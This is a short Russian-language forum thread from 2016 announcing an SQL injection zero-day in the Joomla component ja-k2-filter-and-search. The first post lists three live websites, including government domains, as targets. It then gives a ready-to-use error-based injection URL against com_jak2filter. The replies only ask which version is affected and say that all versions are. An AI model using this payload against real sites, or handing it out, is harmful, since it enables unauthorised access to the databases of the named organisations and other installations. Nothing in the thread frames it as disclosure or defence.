HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.10.2016, 01:42
sTz
Guest
Сообщений: n/a
Провел на форуме:
385

Репутация: 0
По умолчанию
http://sherdoust.ir/

http://www.arhitektura.mrt.gov.me/

http://www.cmvcapanema.pr.gov.br/

(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c 1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2 cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHA R(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)% 2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%2 01%20union%20select%202)a%20group%20by%20x%20limit %201))&Itemid=135&option=com_jak2filter&searchword =the&view=itemlist&xf_2=5%27

As a result, the following error message is displayed proving the presence of vulnerability.
 
Ответить с цитированием

  #2  
Старый 23.10.2016, 11:46
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию
Это под какую версию?
 
Ответить с цитированием

  #3  
Старый 23.10.2016, 15:20
androd
Guest
Сообщений: n/a
Провел на форуме:
5429

Репутация: 2
По умолчанию
Цитата:
Сообщение от brown  
brown said:

Это под какую версию?
Плагин

ja-k2-filter-and-search все версии
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ